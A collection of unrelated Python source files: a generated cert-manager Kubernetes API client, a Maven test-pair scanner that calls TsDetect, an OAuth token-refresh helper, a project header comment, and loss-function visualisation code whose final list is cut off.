path_params['name'] = local_var_params['name'] # noqa: E501
if 'namespace' in local_var_params:
path_params['namespace'] = local_var_params['namespace'] # noqa: E501
query_params = []
if 'pretty' in local_var_params and local_var_params['pretty'] is not None: # noqa: E501
query_params.append(('pretty', local_var_params['pretty'])) # noqa: E501
if 'dry_run' in local_var_params and local_var_params['dry_run'] is not None: # noqa: E501
query_params.append(('dryRun', local_var_params['dry_run'])) # noqa: E501
if 'field_manager' in local_var_params and local_var_params['field_manager'] is not None: # noqa: E501
query_params.append(('fieldManager', local_var_params['field_manager'])) # noqa: E501
header_params = {}
form_params = []
local_var_files = {}
body_params = None
if 'body' in local_var_params:
body_params = local_var_params['body']
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json', 'application/yaml']) # noqa: E501
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.select_header_content_type( # noqa: E501
['application/json', 'application/yaml']) # noqa: E501
# Authentication setting
auth_settings = ['BearerToken'] # noqa: E501
return self.api_client.call_api(
'/apis/cert-manager.io/v1alpha3/namespaces/{namespace}/certificates/{name}/status', 'PUT',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='IoCertManagerV1alpha3Certificate', # noqa: E501
auth_settings=auth_settings,
async_req=local_var_params.get('async_req'),
_return_http_data_only=local_var_params.get('_return_http_data_only'), # noqa: E501
_preload_content=local_var_params.get('_preload_content', True),
_request_timeout=local_var_params.get('_request_timeout'),
collection_formats=collection_formats)
def replace_namespaced_issuer(self, name, namespace, body, **kwargs): # noqa: E501
"""replace_namespaced_issuer # noqa: E501
replace the specified Issuer # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.replace_namespaced_issuer(name, namespace, body, async_req=True)
>>> result = thread.get()
:param async_req bool: execute request asynchronously
:param str name: name of the Issuer (required)
:param str namespace: object name and auth scope, such as for teams and projects (required)
:param IoCertManagerV1alpha3Issuer body: (required)
:param str pretty: If 'true', then the output is pretty printed.
:param str dry_run: When present, indicates that modifications should not be persisted. An invalid or unrecognized dryRun directive will result in an error response and no further processing of the request. Valid values are: - All: all dry run stages will be processed
:param str field_manager: fieldManager is a name associated with the actor or entity that is making these changes. The value must be less than or equal to 128 characters long, and only contain printable characters, as defined by https://golang.org/pkg/unicode/#IsPrint.
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:param _request_timeout: timeout setting for this request. If one
number provided, it will be total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:return: IoCertManagerV1alpha3Issuer
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
return self.replace_namespaced_issuer_with_http_info(name, namespace, body, **kwargs) # noqa: E501
def replace_namespaced_issuer_with_http_info(self, name, namespace, body, **kwargs): # noqa: E501
"""replace_namespaced_issuer # noqa: E501
replace the specified Issuer # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.replace_namespaced_issuer_with_http_info(name, namespace, body, async_req=True)
>>> result = thread.get()
:param async_req bool: execute request asynchronously
:param str name: name of the Issuer (required)
:param str namespace: object name and auth scope, such as for teams and projects (required)
:param IoCertManagerV1alpha3Issuer body: (required)
:param str pretty: If 'true', then the output is pretty printed.
:param str dry_run: When present, indicates that modifications should not be persisted. An invalid or unrecognized dryRun directive will result in an error response and no further processing of the request. Valid values are: - All: all dry run stages will be processed
:param str field_manager: fieldManager is a name associated with the actor or entity that is making these changes. The value must be less than or equal to 128 characters long, and only contain printable characters, as defined by https://golang.org/pkg/unicode/#IsPrint.
:param _return_http_data_only: return the response data only, without
the HTTP status code and headers
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:param _request_timeout: timeout setting for this request. If one
number provided, it will be total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:return: tuple(IoCertManagerV1alpha3Issuer, status_code(int), headers(HTTPHeaderDict))
If the method is called asynchronously,
returns the request thread.
"""
local_var_params = locals()
all_params = [
'name',
'namespace',
'body',
'pretty',
'dry_run',
'field_manager'
]
all_params.extend(
[
'async_req',
'_return_http_data_only',
'_preload_content',
'_request_timeout'
]
)
for key, val in six.iteritems(local_var_params['kwargs']):
if key not in all_params:
raise ApiTypeError(
"Got an unexpected keyword argument '%s'"
" to method replace_namespaced_issuer" % key
)
local_var_params[key] = val
del local_var_params['kwargs']
# verify the required parameter 'name' is set
if self.api_client.client_side_validation and ('name' not in local_var_params or # noqa: E501
local_var_params['name'] is None): # noqa: E501
raise ApiValueError("Missing the required parameter `name` when calling `replace_namespaced_issuer`") # noqa: E501
# verify the required parameter 'namespace' is set
if self.api_client.client_side_validation and ('namespace' not in local_var_params or # noqa: E501
local_var_params['namespace'] is None): # noqa: E501
raise ApiValueError("Missing the required parameter `namespace` when calling `replace_namespaced_issuer`") # noqa: E501
# verify the required parameter 'body' is set
if self.api_client.client_side_validation and ('body' not in local_var_params or # noqa: E501
local_var_params['body'] is None): # noqa: E501
raise ApiValueError("Missing the required parameter `body` when calling `replace_namespaced_issuer`") # noqa: E501
collection_formats = {}
path_params = {}
if 'name' in local_var_params:
path_params['name'] = local_var_params['name'] # noqa: E501
if 'namespace' in local_var_params:
path_params['namespace'] = local_var_params['namespace'] # noqa: E501
query_params = []
if 'pretty' in local_var_params and local_var_params['pretty'] is not None: # noqa: E501
query_params.append(('pretty', local_var_params['pretty'])) # noqa: E501
if 'dry_run' in local_var_params and local_var_params['dry_run'] is not None: # noqa: E501
query_params.append(('dryRun', local_var_params['dry_run'])) # noqa: E501
if 'field_manager' in local_var_params and local_var_params['field_manager'] is not None: # noqa: E501
query_params.append(('fieldManager', local_var_params['field_manager'])) # noqa: E501
header_params = {}
form_params = []
local_var_files = {}
body_params = None
if 'body' in local_var_params:
body_params = local_var_params['body']
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json', 'application/yaml']) # noqa: E501
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.select_header_content_type( # noqa: E501
['application/json', 'application/yaml']) # noqa: E501
# Authentication setting
auth_settings = ['BearerToken'] # noqa: E501
return self.api_client.call_api(
'/apis/cert-manager.io/v1alpha3/namespaces/{namespace}/issuers/{name}', 'PUT',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='IoCertManagerV1alpha3Issuer', # noqa: E501
auth_settings=auth_settings,
async_req=local_var_params.get('async_req'),
_return_http_data_only=local_var_params.get('_return_http_data_only'), # noqa: E501
_preload_content=local_var_params.get('_preload_content', True),
_request_timeout=local_var_params.get('_request_timeout'),
collection_formats=collection_formats)
def replace_namespaced_issuer_status(self, name, namespace, body, **kwargs): # noqa: E501
"""replace_namespaced_issuer_status # noqa: E501
replace status of the specified Issuer # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.replace_namespaced_issuer_status(name, namespace, body, async_req=True)
>>> result = thread.get()
:param async_req bool: execute request asynchronously
:param str name: name of the Issuer (required)
:param str namespace: object name and auth scope, such as for teams and projects (required)
:param IoCertManagerV1alpha3Issuer body: (required)
:param str pretty: If 'true', then the output is pretty printed.
:param str dry_run: When present, indicates that modifications should not be persisted. An invalid or unrecognized dryRun directive will result in an error response and no further processing of the request. Valid values are: - All: all dry run stages will be processed
:param str field_manager: fieldManager is a name associated with the actor or entity that is making these changes. The value must be less than or equal to 128 characters long, and only contain printable characters, as defined by https://golang.org/pkg/unicode/#IsPrint.
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:param _request_timeout: timeout setting for this request. If one
number provided, it will be total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:return: IoCertManagerV1alpha3Issuer
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
return self.replace_namespaced_issuer_status_with_http_info(name, namespace, body, **kwargs) # noqa: E501
def replace_namespaced_issuer_status_with_http_info(self, name, namespace, body, **kwargs): # noqa: E501
"""replace_namespaced_issuer_status # noqa: E501
replace status of the specified Issuer # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.replace_namespaced_issuer_status_with_http_info(name, namespace, body, async_req=True)
>>> result = thread.get()
:param async_req bool: execute request asynchronously
:param str name: name of the Issuer (required)
:param str namespace: object name and auth scope, such as for teams and projects (required)
:param IoCertManagerV1alpha3Issuer body: (required)
:param str pretty: If 'true', then the output is pretty printed.
:param str dry_run: When present, indicates that modifications should not be persisted. An invalid or unrecognized dryRun directive will result in an error response and no further processing of the request. Valid values are: - All: all dry run stages will be processed
:param str field_manager: fieldManager is a name associated with the actor or entity that is making these changes. The value must be less than or equal to 128 characters long, and only contain printable characters, as defined by https://golang.org/pkg/unicode/#IsPrint.
:param _return_http_data_only: return the response data only, without
the HTTP status code and headers
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:param _request_timeout: timeout setting for this request. If one
number provided, it will be total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:return: tuple(IoCertManagerV1alpha3Issuer, status_code(int), headers(HTTPHeaderDict))
If the method is called asynchronously,
returns the request thread.
"""
local_var_params = locals()
all_params = [
'name',
'namespace',
'body',
'pretty',
'dry_run',
'field_manager'
]
all_params.extend(
[
'async_req',
'_return_http_data_only',
'_preload_content',
'_request_timeout'
]
)
for key, val in six.iteritems(local_var_params['kwargs']):
if key not in all_params:
raise ApiTypeError(
"Got an unexpected keyword argument '%s'"
" to method replace_namespaced_issuer_status" % key
)
local_var_params[key] = val
del local_var_params['kwargs']
# verify the required parameter 'name' is set
if self.api_client.client_side_validation and ('name' not in local_var_params or # noqa: E501
local_var_params['name'] is None): # noqa: E501
raise ApiValueError("Missing the required parameter `name` when calling `replace_namespaced_issuer_status`") # noqa: E501
# verify the required parameter 'namespace' is set
if self.api_client.client_side_validation and ('namespace' not in local_var_params or # noqa: E501
local_var_params['namespace'] is None): # noqa: E501
raise ApiValueError("Missing the required parameter `namespace` when calling `replace_namespaced_issuer_status`") # noqa: E501
# verify the required parameter 'body' is set
if self.api_client.client_side_validation and ('body' not in local_var_params or # noqa: E501
local_var_params['body'] is None): # noqa: E501
raise ApiValueError("Missing the required parameter `body` when calling `replace_namespaced_issuer_status`") # noqa: E501
collection_formats = {}
path_params = {}
if 'name' in local_var_params:
path_params['name'] = local_var_params['name'] # noqa: E501
if 'namespace' in local_var_params:
path_params['namespace'] = local_var_params['namespace'] # noqa: E501
query_params = []
if 'pretty' in local_var_params and local_var_params['pretty'] is not None: # noqa: E501
query_params.append(('pretty', local_var_params['pretty'])) # noqa: E501
if 'dry_run' in local_var_params and local_var_params['dry_run'] is not None: # noqa: E501
query_params.append(('dryRun', local_var_params['dry_run'])) # noqa: E501
if 'field_manager' in local_var_params and local_var_params['field_manager'] is not None: # noqa: E501
query_params.append(('fieldManager', local_var_params['field_manager'])) # noqa: E501
header_params = {}
form_params = []
local_var_files = {}
body_params = None
if 'body' in local_var_params:
body_params = local_var_params['body']
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json', 'application/yaml']) # noqa: E501
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.select_header_content_type( # noqa: E501
['application/json', 'application/yaml']) # noqa: E501
# Authentication setting
auth_settings = ['BearerToken'] # noqa: E501
return self.api_client.call_api(
'/apis/cert-manager.io/v1alpha3/namespaces/{namespace}/issuers/{name}/status', 'PUT',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='IoCertManagerV1alpha3Issuer', # noqa: E501
auth_settings=auth_settings,
async_req=local_var_params.get('async_req'),
_return_http_data_only=local_var_params.get('_return_http_data_only'), # noqa: E501
_preload_content=local_var_params.get('_preload_content', True),
_request_timeout=local_var_params.get('_request_timeout'),
collection_formats=collection_formats)
|
import logging
import re
import subprocess
from collections import OrderedDict
from pathlib import Path
from typing import Dict, List, Optional, Set, Tuple
import pandas as pd
from effectiveness.code_analysis.get_commit import get_last_commit_id
from effectiveness.code_analysis.pom_module import CutPair, PomModule
from effectiveness.pom_utils import ET, POM_NSMAP
from effectiveness.settings import SCAN_PROJECT_DIR, TSDETECT_DIR, TSDETECT_JAR
special_cases = {
'core': ('/src/', '/test/'),
'guava': ('/src/', '/guava-tests/test/'),
'guava-gwt': ('/src/', '/test/'),
}
IGNORED_SUBMODULES: Dict[str, Set[str]] = {
"opengrok": {"opengrok-tools", "distribution"},
}
def filter_submodule_exceptions(project: str, modules: List[str]) -> List[str]:
try:
return list(set(modules) - IGNORED_SUBMODULES[project])
except KeyError:
return modules
def get_submodules(project_path: Path) -> List[str]:
"""
    Analyzes the structure of the project and detects whether more modules are present
Returns:
list of submodules
"""
pom_path = project_path / 'pom.xml'
assert pom_path.exists()
pom_parsed = ET.parse(pom_path)
modules = pom_parsed.find('pom:modules', POM_NSMAP)
modules_list = []
    if modules is not None:
for module in modules.findall('pom:module', POM_NSMAP):
detected_module = module.text
if 'xml' not in detected_module:
modules_list.append(detected_module)
    logging.info(f'Found {len(modules_list)} module(s): {modules_list}')
return filter_submodule_exceptions(project_path.name, modules_list)
def search_project_tests(project_path: Path, results_dir=SCAN_PROJECT_DIR):
submodules = get_submodules(project_path)
if submodules:
submodule_cuts = {}
for submodule in submodules:
submodule_path = project_path / submodule
cuts = search_module_tests(
project_path,
project_path.name,
submodule_path,
submodule,
results_dir=results_dir,
)
submodule_cuts[submodule] = cuts
total_tests = sum(len(cuts) for cuts in submodule_cuts.values())
print(f"Total tests for {project_path.name}: {total_tests}")
for submodule, cuts in submodule_cuts.items():
print(f" - {submodule}: {len(cuts)}")
else:
search_module_tests(
project_path, project_path.name, project_path, results_dir=results_dir
)
def search_module_tests(
project_path: Path,
project_name: str,
module_path: Path,
    module_name: Optional[str] = None,
results_dir: Path = SCAN_PROJECT_DIR,
) -> List[CutPair]:
"""Scan a project and save CUTs with their tests to a file"""
pom = module_path / 'pom.xml'
if not pom.exists():
return []
if module_name:
full_name = f"{project_name}/{module_name}"
else:
full_name = project_name
print(f"* Scanning {full_name}")
print(f"* * Found pom: {pom}")
tree = ET.parse(pom)
root = tree.getroot()
include_patterns = []
exclude_patterns = []
surefire_plugin = root.find(
".//pom:plugin/[pom:artifactId='maven-surefire-plugin']", POM_NSMAP
)
if surefire_plugin is None:
if module_path != project_path:
print("* * * Couldn't find maven-surefire-plugin in pom")
print("* * * Searching parent pom")
parent_pom = project_path / 'pom.xml'
if parent_pom.exists():
print(f"* * * Found parent pom: {parent_pom}")
surefire_plugin = (
ET.parse(parent_pom)
.getroot()
.find(".//pom:plugin/[pom:artifactId='maven-surefire-plugin']", POM_NSMAP)
)
if surefire_plugin is None:
print("* * * Couldn't find maven-surefire-plugin in any pom")
else:
print("* * maven-surefire-plugin found")
includes = surefire_plugin.findall('.//pom:include', POM_NSMAP)
for include in includes:
include_patterns.append(include.text)
excludes = surefire_plugin.findall('.//pom:exclude', POM_NSMAP)
for exclude in excludes:
exclude_patterns.append(exclude.text)
DEFAULT_INCLUDES = [
"**/*Test.java",
"**/Test*.java",
"**/*Tests.java",
"**/*TestCase.java",
]
print("* * Found include patterns:", include_patterns)
if not include_patterns:
include_patterns = DEFAULT_INCLUDES
else:
for i in reversed(range(len(include_patterns))):
pat = include_patterns[i]
if pat.endswith("AllTests.java"):
# TODO: parse AllTests.java
print("* * * AllTests.java file found in includes!")
if len(include_patterns) == 1:
include_patterns = DEFAULT_INCLUDES
break
else:
del include_patterns[i]
include_patterns = list(set(include_patterns))
print("* * Adjusted include patterns:", include_patterns)
source_directory, test_source_directory = get_source_directories(
module_path,
project_name,
module_name,
)
module = PomModule(project_name, module_name, include_patterns, exclude_patterns)
# special case for guava
    if project_name == 'guava' and not module_path.name.endswith('gwt'):
tests_path = module_path.parent / test_source_directory
else:
tests_path = module_path / test_source_directory
main_path = module_path / source_directory
print("* * Main path:", main_path)
print("* * Tests path:", tests_path)
# TODO: remove duplicate test entries
test_pairs = list(module.find_cut_pairs(tests_path, main_path))
print(f"* * - {full_name}: Found {len(test_pairs)} class-test pairs")
cut_pairs_to_csv(test_pairs, module_path, module, results_dir)
# TODO: move to separate file
pairs_to_tsdetect_csv(test_pairs, project_name, results_dir)
tsdetect_analyze_project(project_name, input_dir=results_dir)
merge_tsdetect_files()
return test_pairs
def tsdetect_analyze_project(
project_name: str,
*,
input_dir: Path = SCAN_PROJECT_DIR,
output_dir: Path = TSDETECT_DIR / "projects",
):
print(f"* * Running TsDetect on {project_name}")
subprocess.run(
[
"java",
"-jar",
TSDETECT_JAR,
input_dir / f"tsDetect_{project_name}.csv",
],
check=True,
)
output_file = Path.cwd() / f"TsDetect_{project_name}.csv"
output_file.rename(output_dir / output_file.name)
def pairs_to_tsdetect_csv(
test_pairs: List[CutPair], projectName: str, output_dir: Path = SCAN_PROJECT_DIR
):
project = [projectName] * len(test_pairs)
path_test = [test_pair.test_path for test_pair in test_pairs]
path_src = [test_pair.source_path for test_pair in test_pairs]
frame = pd.DataFrame(
OrderedDict(
(
('project', project),
('path_test', path_test),
('path_src', path_src),
)
)
)
output_file = output_dir / f"tsDetect_{projectName}.csv"
print("* * Saving output for tsDetect to", output_file)
frame.to_csv(output_file, index=False, header=False)
def merge_tsdetect_files(
*, input_dir: Path = TSDETECT_DIR / "projects", output_dir: Path = TSDETECT_DIR
):
print(f"* * Merging tsDetect csvs in {input_dir}")
all_files = input_dir.glob("TsDetect_*.csv")
frame = pd.concat(
map(pd.read_csv, all_files),
ignore_index=True,
)
output_file = output_dir / "test-smells.csv"
frame.to_csv(output_file, index=False)
print(f"* * Done merging to {output_file}")
def cut_pairs_to_csv(
test_pairs: List[CutPair],
module_path: Path,
module: PomModule,
output=SCAN_PROJECT_DIR,
):
last_commit = get_last_commit_id(module_path)
project = [module.project_name] * len(test_pairs)
module_col = [module.name] * len(test_pairs)
test_path = [test_pair.test_path for test_pair in test_pairs]
test_name = [test_pair.test_qualified_name for test_pair in test_pairs]
class_path = [test_pair.source_path for test_pair in test_pairs]
src_name = [test_pair.source_qualified_name for test_pair in test_pairs]
frame = pd.DataFrame(
OrderedDict(
(
('project', project),
('module', module_col),
('commit', last_commit),
('test_path', test_path),
('test_name', test_name),
('class_path', class_path),
('class_name', src_name),
)
)
)
old_output = output / f"res_{module.name}.csv"
latest = output / module.project_name / "latest"
output = output / module.project_name / last_commit
output.mkdir(exist_ok=True, parents=True)
if not latest.is_symlink() and latest.is_dir():
import shutil
shutil.rmtree(latest)
latest.unlink(missing_ok=True)
latest.symlink_to(output.relative_to(latest.parent), target_is_directory=True)
filename = f"tests_{module.name or module.project_name}.csv"
print("* * Saving CUTs to", output / filename)
frame.to_csv(old_output, index=False)
frame.to_csv(output / filename, index=False)
def load_cut_pairs(path: Path) -> Optional[Tuple[str, str, List[CutPair]]]:
"""Loads CUT data from `path`
Returns:
(project_name, module_name, list_of_cuts)
or None if there's no data
"""
data = pd.read_csv(path)
if data.empty:
return None
project = data["project"].unique()
assert len(project) == 1, f"{path} should contain data for one project"
module = data["module"].fillna('').unique()
assert len(module) == 1, f"{path} should contain data for one module"
return (
project[0],
module[0],
[
CutPair(test_path, test_qualified_name, source_path, source_qualified_name)
for test_path, test_qualified_name, source_path, source_qualified_name in data[
["test_path", "test_name", "class_path", "class_name"]
].itertuples(index=False)
],
)
def get_source_directories(
    module_path: Path, project_name: str, module_name: Optional[str]
) -> Tuple[str, str]:
"""Return the source and test source directory from the pom (or one of the poms)"""
try:
look_for = project_name if not module_name else module_name
return special_cases[look_for]
except KeyError:
pass
pom_paths = list(module_path.glob('pom*.xml'))
override_source = look_for_tag(pom_paths, 'sourceDirectory', direct_children_of="build")
override_test_source = look_for_tag(
pom_paths, 'testSourceDirectory', direct_children_of="build"
)
# check the test dir and the source dir
test_dir = 'src/test/java' if override_test_source is None else override_test_source
test_dir = test_dir.strip('/')
src_dir = 'src/main' if override_source is None else override_source
src_dir = src_dir.strip('/')
return src_dir, test_dir
def look_for_tag(
poms: List[Path], tag: str, *, children_of: str = None, direct_children_of: str = None
) -> Optional[str]:
"""Return string content of a tag in one of the supplied poms"""
for pom in poms:
pom = ET.parse(pom).getroot()
if children_of:
pattern = f".//pom:{children_of}//pom:{tag}"
elif direct_children_of:
pattern = f".//pom:{direct_children_of}/pom:{tag}"
else:
pattern = f".//pom:{tag}"
element = pom.find(pattern, POM_NSMAP)
if element is not None:
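            # strip interpolated placeholders such as '${...}' (and similar
            # '@...@' tokens) from the configured path before returning it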
return re.sub("[$@*}?].*[$@*}?]", "", element.text)
return None
if __name__ == '__main__':
def main():
from sys import argv, exit
if len(argv) < 2:
print(f"Error! Usage: {argv[0]} <project_path> [<result_path>]")
exit(1)
search_project_tests(*map(Path, argv[1:3]))
main()
|
"""Useful functions."""
import logging
import os
import sys
from configparser import ConfigParser, RawConfigParser
from datetime import datetime
from json import loads
from urllib.error import HTTPError
from urllib.parse import urlencode
from urllib.request import Request, urlopen
logger = logging.getLogger("Token manager")
class ClassProperty:
"""
Decorator that allows get methods like class properties.
"""
def __init__(self, fget):
self.fget = fget
def __get__(self, owner_self, owner_cls):
return self.fget(owner_cls)
classproperty = ClassProperty
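# A minimal illustration of the decorator (hypothetical class, not used below):
#
#     class Greeter:
#         @classproperty
#         def name(cls):
#             return cls.__name__
#
#     Greeter.name  # -> 'Greeter', accessed without an instance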
class TokenManager:
"""
Class for token managing.
Simple usage:
print(TokenManager.id_token)
print(TokenManager.access_token)
Requires dataload.ini with:
[CONNECTION]
token_endpoint = <token_endpoint_url>
retries = <retries_count>
Requires "REFRESH_TOKEN", "CLIENT_ID", "CLIENT_SECRET" in environment variables
"""
_config = ConfigParser()
_config.read("config/dataload.ini")
expire_date = 0
try:
_retries = _config.getint("CONNECTION", "retries")
_token_endpoint = _config["CONNECTION"]["token_endpoint"]
except KeyError as e:
logger.error(f"'{e.args[0]}' should be in dataload.ini")
        sys.exit(1)
try:
_refresh_token = os.environ["REFRESH_TOKEN"]
_client_id = os.environ["CLIENT_ID"]
_client_secret = os.environ["CLIENT_SECRET"]
except KeyError as e:
logger.error(f"Environment should have variable '{e.args[0]}'")
        sys.exit(1)
@classproperty
def id_token(cls):
"""
Check expiration date and return id_token.
"""
if datetime.now().timestamp() > cls.expire_date:
cls.refresh()
return cls._id_token
@classproperty
def access_token(cls):
"""
Check expiration date and return access_token.
"""
if datetime.now().timestamp() > cls.expire_date:
cls.refresh()
return cls._access_token
@classmethod
def refresh(cls):
"""
Refresh token and save them into class.
"""
logger.info(f"Refreshing token.")
for i in range(cls._retries):
# try several times if there any error
try:
resp = cls.refresh_request(
cls._token_endpoint, cls._refresh_token, cls._client_id, cls._client_secret)
except HTTPError:
if i == cls._retries - 1:
# too many errors, raise original exception
raise
cls._id_token = resp["id_token"]
cls._access_token = resp["access_token"]
cls.expire_date = datetime.now().timestamp() + resp["expires_in"]
logger.info(f"Token is refreshed.")
@staticmethod
def refresh_request(url: str, refresh_token: str, client_id: str, client_secret: str) -> dict:
"""
Send refresh token requests to OpenID token endpoint.
Return dict with keys "access_token", "expires_in", "scope", "token_type", "id_token".
"""
body = {
"grant_type": "refresh_token",
"refresh_token": refresh_token,
"client_id": client_id,
"client_secret": client_secret,
}
headers = {
"Content-Type": "application/x-www-form-urlencoded"
}
data = urlencode(body).encode("utf8")
request = Request(url=url, data=data, headers=headers)
try:
response = urlopen(request)
response_body = response.read()
return loads(response_body)
except HTTPError as e:
code = e.code
message = e.read().decode("utf8")
logger.error(f"Refresh token request failed. {code} {message}")
raise
def get_token(config: RawConfigParser) -> str:
"""
Refresh access or id token depending on config settings.
:param RawConfigParser config: config that is used in calling module
:return: token of requested type
:rtype: str
"""
token_type = config.get("CONNECTION", "token_type")
tokens_dict = {
"access_token": TokenManager.access_token,
"id_token": TokenManager.id_token
}
if token_type not in tokens_dict.keys():
logger.error(f"Unknown type of token {token_type}. Set correct token type in config file.")
sys.exit(2)
return tokens_dict.get(token_type)
def get_headers(config: RawConfigParser) -> dict:
"""
Get request headers.
:param RawConfigParser config: config that is used in calling module
:return: dictionary with headers required for requests
:rtype: dict
"""
return {
"Content-Type": "application/json",
"data-partition-id": config.get("CONNECTION", "data-partition-id"),
"Authorization": f"Bearer {get_token(config)}"
}
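# A minimal usage sketch (assumes config/dataload.ini also defines "token_type"
# and "data-partition-id" under [CONNECTION], plus the environment variables
# required by TokenManager; the URL is a placeholder):
#
#     config = RawConfigParser()
#     config.read("config/dataload.ini")
#     request = Request(url="https://example.com/api", headers=get_headers(config))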
|
#################################################################################
## Project : AuShadha
## Description : Provides the UI app for AuShadha. The Core UI and its elements.
## Date : 15-10-2013
##
## This code is generously borrowed from Django's own admin app
##
## See django.contrib.admin.__init__.py for details on how the parent application
## sets it up
#################################################################################
|
from pathlib import Path
import torch
import numpy as np
import argparse
import matplotlib.pyplot as plt
import matplotlib.colors as mcolors
from mpl_toolkits.mplot3d import Axes3D # https://stackoverflow.com/a/56222305
from scipy.spatial.transform import Rotation as R
from post.plots import get_figa
from mvn.mini import get_config
from mvn.pipeline.setup import setup_dataloaders
from mvn.utils.multiview import build_intrinsics, Camera
from mvn.utils.tred import get_cam_location_in_world, apply_umeyama, rotz, rotation_matrix2axis_angle
from mvn.pipeline.ours import PELVIS_I
from mvn.models.loss import KeypointsMSESmoothLoss, GeodesicLoss
def viz_geodesic():
""" really appreciate https://docs.scipy.org/doc/scipy/reference/generated/scipy.spatial.transform.Rotation.html """
def _gen_some_eulers():
return np.float64([])
rots = torch.cat([
# rotx(torch.tensor(np.pi / 2)).unsqueeze(0),
# roty(torch.tensor(np.pi / 3)).unsqueeze(0),
rotz(torch.tensor(np.pi / 2)).unsqueeze(0),
torch.tensor(R.random().as_matrix()).unsqueeze(0),
torch.tensor(R.random().as_matrix()).unsqueeze(0),
torch.tensor(R.random().as_matrix()).unsqueeze(0),
])
distances = GeodesicLoss()._criterion(
rots.float(),
torch.eye(3, 3).repeat(rots.shape[0], 1, 1).float().to(rots.device)
)
angle_axis = rotation_matrix2axis_angle(rots)
fig = plt.figure(figsize=plt.figaspect(1.5))
axis = fig.add_subplot(1, 1, 1, projection='3d')
for aa, dist, color in zip(
angle_axis.numpy(),
distances.numpy(),
mcolors.TABLEAU_COLORS):
label = 'rotate by {:.0f}° along [{:.1f}, {:.1f}, {:.1f}]: geodesic distance {:.2f}'.format(
np.degrees(aa[-1]), aa[0], aa[1], aa[2], dist
)
axis.plot(
[0, aa[0]], # from origin ...
[0, aa[1]],
[0, aa[2]], # ... to vec
label=label,
color=color
)
# show axis
axis.quiver(
0, 0, 0,
1, 0, 0,
normalize=True,
color='black',
linestyle='--'
)
axis.quiver(
0, 0, 0,
0, 1, 0,
normalize=True,
color='black',
linestyle='--'
)
axis.quiver(
0, 0, 0,
0, 0, 1,
normalize=True,
color='black',
linestyle='--'
)
coord_lim = 1.0
axis.set_xlim3d(-coord_lim, coord_lim)
axis.set_ylim3d(-coord_lim, coord_lim)
axis.set_zlim3d(-coord_lim, coord_lim)
axis.legend(loc='lower left')
plt.tight_layout()
plt.show()
def viz_se_smooth():
def smooth(threshold, alpha, beta):
def _f(x):
x[x > threshold] = np.power(
x[x > threshold],
alpha
) * (threshold ** beta) # soft version
return x
return _f
n_points = 100
xs = np.linspace(0, 2e2, n_points)
threshold = 1e2
_, axis = get_figa(1, 1, heigth=12, width=30)
for alpha in np.linspace(0.1, 0.3, 2):
for beta in np.linspace(0.9, 1.5, 3):
ys = smooth(threshold, alpha, beta)(xs.copy())
axis.plot(
xs, ys,
label='smoothed (alpha={:.1f}, beta={:.1f})'.format(alpha, beta)
)
axis.plot(xs, xs, label='MSE (original)')
axis.vlines(x=threshold, ymin=0, ymax=np.max(
xs), linestyle=':', label='threshold')
axis.set_xlim((xs[0], xs[-1]))
axis.set_yscale('log')
axis.legend(loc='upper left')
axis.set_xlabel('original loss')
plt.tight_layout()
plt.show()
def viz_berhu():
def berhu(c):
def _f(x):
out = x.copy()
out[np.abs(x) <= c] = np.abs(out[np.abs(x) <= c])
out[np.abs(x) > c] = (np.square(out[np.abs(x) > c]) + np.square(c)) / (2*c)
return out
return _f
xs = np.linspace(-5, 5, 1000)
_, axis = get_figa(1, 1, heigth=12, width=30)
for c in np.linspace(0.5, 2.5, 4):
ys = berhu(c)(xs)
axis.plot(
xs, ys,
label='berHu (threshold={:.3f})'.format(c)
)
axis.plot(
xs, np.square(xs),
'--',
label='L2',
)
axis.plot(
xs, np.abs(xs),
'--',
label='L1',
)
axis.set_xlim((xs[0], xs[-1]))
axis.legend(loc='upper left')
plt.tight_layout()
plt.show()
def viz_huber():
def huber(c):
def _f(x):
out = x.copy()
out[np.abs(x) <= c] = np.square(out[np.abs(x) <= c]) * 0.5
out[np.abs(x) > c] = c * (np.abs(out[np.abs(x) > c]) - 0.5 * c)
return out
return _f
xs = np.linspace(-5, 5, 1000)
_, axis = get_figa(1, 1, heigth=12, width=30)
for c in np.linspace(0.5, 2.5, 4):
ys = huber(c)(xs)
axis.plot(
xs, ys,
            label='Huber (threshold={:.3f})'.format(c)
)
axis.plot(
xs, np.square(xs),
'--',
label='L2',
)
axis.plot(
xs, np.abs(xs),
'--',
label='L1',
)
axis.set_xlim((xs[0], xs[-1]))
axis.legend(loc='upper left')
plt.tight_layout()
plt.show()
def get_joints_connections():
return [
        (6, 3),  # pelvis -> left hip
        (3, 4),  # left hip -> left knee
        (4, 5),  # left knee -> left foot
        (6, 2),  # pelvis -> right hip
        (2, 1),  # right hip -> right knee
        (1, 0),  # right knee -> right foot
